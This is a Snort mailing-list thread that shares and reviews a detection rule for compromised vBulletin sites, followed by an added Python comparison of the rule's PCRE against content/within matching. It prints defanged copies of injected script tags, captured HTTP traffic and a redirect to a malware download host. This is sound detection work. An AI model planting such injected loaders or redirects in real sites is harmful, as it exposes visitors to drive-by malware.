Snort mailing list archives
Re: Compromised vBulletin sig
From: Matt Mickel <mmickel () sourcefire com>
Date: Thu, 30 Apr 2015 14:49:42 -0400
Hi, James-

This rule has been reviewed and added to the community ruleset. I removed the PCRE from the committed version and instead used the within content modifier. This made the rule much more efficient while still detecting the relevant content.

Thanks so much for your submission.

Cheers,
Matt Mickel

On 04/16/2015 01:30 PM, James Lay wrote:
Didn't see this in any current ruleset, so I thought I'd post it here. Yesterday I saw two of these.

Injected into the vBulletin initial page:

<script type="text/javascript" src="meow://meh[.]com/misc.php?v=364&js=js"></script>
<script type="text/javascript" src="meow://bleh[.]com/forums/misc.php?v=420&js=js"></script>

#######################################################################################
GET /misc.php?v=364&js=js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: meh.com
Cookie: __cfduid=bleh; bbsessionhash=bleh; bblastvisit=1429113507; bblastactivity=0
Cache-Control: max-stale=0
Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 15:58:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: bblastactivity=0; expires=Thu, 14-Apr-2016 15:58:27 GMT; path=/
Set-Cookie: bblang_id=en; expires=Thu, 16-Apr-2015 01:58:27 GMT
X-Powered-By: PleskLin
Server: cloudflare-nginx
CF-RAY: 1d78da121f59012e-SJC
Content-Encoding: gzip

document.location='meow://filestore72[.]info/download.php?id=f823cc00'
#######################################################################################

This in turn goes to:

#######################################################################################
GET /download.php?id=f823cc00 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: filestore72[.]info
Cache-Control: max-stale=0
Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.0.12
Date: Wed, 15 Apr 2015 15:53:40 GMT
Content-Type: text/html
Content-Length: 161
Connection: close
Location: meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z=Z2xham91PWtuY2h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxlc3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAlM2ZpZD1mODIzY2MwMA==

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.0.12</center>
</body>
</html>
#######################################################################################

Seems to be old-ish news, but the sig is below:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SERVER-WEBAPP Compromised vbulletin site"; flow:established,to_server; uricontent:"/misc.php?"; uricontent:"v="; uricontent:"js=js"; pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui"; reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info; classtype:bad-unknown; sid:10000156; rev:1;)

As usual, not sure if I have this perfect so anything to improve this sig would be excellent.

Thank you.

James

_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org
Please visit http://blog.snort.org for the latest news about Snort!
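As an added illustration (not code from the thread, and not the rule Matt committed, which the archive does not show), the Python below models the two ways of expressing James's loader check: the posted PCRE, and a PCRE-free form built from content matches with distance and within, which is the approach Matt describes. The distance/within semantics, the nocase handling and the request-line parser are this example's own assumptions, modelled on the Snort manual's description of those keywords rather than on Snort's code. The sample request lines are constructed: the two loader URIs from the post plus lookalikes chosen to show where the two forms agree and where they differ.

```python
"""Compare the PCRE in the posted sig with a PCRE-free content/distance/within
form. Keyword semantics here are an assumption modelled on the Snort manual,
not a Snort implementation."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Content:
    pattern: bytes
    distance: int = 0            # bytes to skip after the previous match before searching
    within: Optional[int] = None  # the match must end within this many bytes of the search start
    nocase: bool = False          # case-insensitive compare, like Snort's nocase modifier


def match_contents(buf: bytes, contents: list[Content]) -> bool:
    """True when every content matches in order, honouring distance/within (assumed semantics)."""
    cursor = 0  # byte offset just past the previous match
    for c in contents:
        hay = buf.lower() if c.nocase else buf
        needle = c.pattern.lower() if c.nocase else c.pattern
        start = cursor + c.distance
        end = len(hay) if c.within is None else start + c.within
        idx = hay.find(needle, start, end)  # needle must fit entirely inside [start, end)
        if idx < 0:
            return False
        cursor = idx + len(needle)
    return True


# The PCRE from James's rule; the /U (normalised URI) and /i flags are approximated
# by matching re.I against the raw request-target.
PCRE_LOADER = re.compile(rb"misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs", re.I)

# PCRE-free form: "&js=js" must sit exactly three bytes after "/misc.php?v=".
# distance:3 skips the three version bytes; within:6 leaves the 6-byte pattern no slack.
# Unlike [0-9]{3}, this does not check that the three skipped bytes are digits.
CONTENT_LOADER = [
    Content(b"/misc.php?v=", nocase=True),
    Content(b"&js=js", distance=3, within=6, nocase=True),
]


def request_uri(request_line: str) -> bytes:
    """Pull the request-target out of an HTTP/1.x request line (assumed well-formed)."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        raise ValueError(f"not an HTTP request line: {request_line!r}")
    return parts[1].encode()


def evaluate(request_line: str) -> tuple[bool, bool]:
    """Return (pcre_hit, content_hit) for one request line."""
    uri = request_uri(request_line)
    return bool(PCRE_LOADER.search(uri)), match_contents(uri, CONTENT_LOADER)


# Constructed sample: the two loaders from the post plus lookalikes.
SAMPLE_REQUEST_LINES = [
    "GET /misc.php?v=364&js=js HTTP/1.1",         # loader from the post
    "GET /forums/misc.php?v=420&js=js HTTP/1.1",  # second loader from the post
    "GET /misc.php?v=4&js=js HTTP/1.1",           # one version digit: neither form fires
    "GET /misc.php?v=1234&js=js HTTP/1.1",        # four version digits: neither form fires
    "GET /misc.php?v=36a&js=js HTTP/1.1",         # non-digit: PCRE rejects, content form accepts
    "GET /index.php?v=364&js=js HTTP/1.1",        # different script: neither form fires
]


def compare_all(lines=SAMPLE_REQUEST_LINES) -> dict[str, tuple[bool, bool]]:
    """Evaluate every sample line under both forms."""
    return {line: evaluate(line) for line in lines}


if __name__ == "__main__":
    for line, (pcre_hit, content_hit) in compare_all().items():
        print(f"pcre={pcre_hit!s:5} content={content_hit!s:5}  {line}")
```

Running it shows the two forms agreeing on the posted loaders and on the wrong-length lookalikes, while the content-only form also accepts three non-digit bytes after v= (the 36a case) that the PCRE's [0-9]{3} rejected. That slightly wider match is the trade the PCRE-free version makes for skipping the regex engine on every matching URI, and it is worth checking against your own traffic whether the extra matches matter.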
Current thread:
- Compromised vBulletin sig James Lay (Apr 16)
- Re: Compromised vBulletin sig Matt Mickel (May 04)